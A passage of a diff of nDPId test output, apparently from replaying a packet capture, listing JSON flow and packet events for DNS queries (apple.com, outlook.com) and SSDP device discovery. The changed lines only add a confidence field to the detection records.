+00773{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.96.59"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1569687267847,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"ts_msec":1569687267847,"pkt":"NDY7z3UoLH6BsEqhCABFAABNAABAADoRnydLS0tLCgAA4wA1yxYAOeBneJ6BgAABAAEAAAAABG1haWwGdmlhc2F0A2NvbQAAAQABwAwAAQABAAAAPAAECCVnxA=="}
-00752{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mail.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"8.37.103.196"}}
+00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mail.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"8.37.103.196"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267851,"flow_last_seen":1569687267851,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1569687267851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1569687267851,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1569687267851,"pkt":"LH6BsEqhNDY7z3UoCABFAAA9LvsAAP8R6zsKAADjS0tLS+LaADUAKWM2zl4BAAABAAAAAAAAA3d3dwdvdXRsb29rA2NvbQAAAQAB"}
-00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267851,"flow_last_seen":1569687267851,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1569687267851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267851,"flow_last_seen":1569687267851,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1569687267851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1569687267865,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"ts_msec":1569687267865,"pkt":"NDY7z3UoLH6BsEqhCABFAADYAABAADoRnpxLS0tLCgAA4wA14toAxJ5uzl6BgAABAAcAAAAAA3d3dwdvdXRsb29rA2NvbQAAAQABwAwABQABAAAAzQAUB291dGxvb2sJb2ZmaWNlMzY1wBjALQAFAAEAAABWABkHb3V0bG9vawdtcy1hY2RjBm9mZmljZcAYwE0ABQABAAAHZQAKB3NqYy1lZnrAVcByAAEAAQAAADAABChh3iLAcgABAAEAAAAwAAQ0YAOCwHIAAQABAAAAMAAEKGHdcsByAAEAAQAAADAABDRgEgI="}
-00755{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1569687267865,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.97.222.34"}}
+00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1569687267865,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.97.222.34"}}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1569687267881,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687267881,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0KOdAAPMG5BAIJWfECgAA4wG73ieGjW4CDCXQ8YAQTdZYOgAAAQEICninPiMcDdF\/"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267988,"flow_last_seen":1569687267988,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687267988,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1569687267988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687267988,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0c9UAAEAG69IKAADjSn3FvN4qAbvQnkCVU\/eYD4AREABMcgAAAQEIChwN0hGhDZLg"}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1569687267991,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1569687267991,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKY+gAAAERWl4KAADj7\/\/\/+u+QB2wAtlB4TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1569687268026,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687268026,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0lz4AAGoGnmlKfcW8CgAA4wG73ipT95gP0J5AloAQAP3kSQAAAQEICqEOCgscDdIR"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1569687268077,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"ts_msec":1569687268077,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA45bY75ACCk+7SFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MjggR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1569687268176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687268176,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAg9AAAAQEIChwN0scGksZO"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1569687268376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"ts_msec":1569687268376,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj5RAAEARlIwKAACXCgAA4wds75ABPzXfSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268559,"flow_last_seen":1569687268559,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1569687268559,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1569687268559,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1569687268559,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKeUwAAAERRPoKAADj7\/\/\/+uDLB2wAtl89TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268559,"flow_last_seen":1569687268559,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1569687268559,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268559,"flow_last_seen":1569687268559,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1569687268559,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268746,"flow_last_seen":1569687268746,"flow_idle_time":180000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1569687268746,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1569687268746,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"ts_msec":1569687268746,"pkt":"LH6BsEqhNDY7z3UoCABFAAB\/CAgAAEAR+QMKAADjCCVmW9NbAbsAa+4DFgEAAAAAAAAAAAAAVgEAAEoAAAAAAAAASgEA7YnEaZ6hZImmhCHr0JUfCBctWVvywlB71JRnxl7mI4ogm7BxyKgEQGFPg0eizi7+AVQMevU74i4erAc5hyngJu8AAAIAOQEA"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687268747,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1569687268747,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"ts_msec":1569687268747,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA48Oh4MsCCjG3SFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MjggR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687268747,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687268747,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
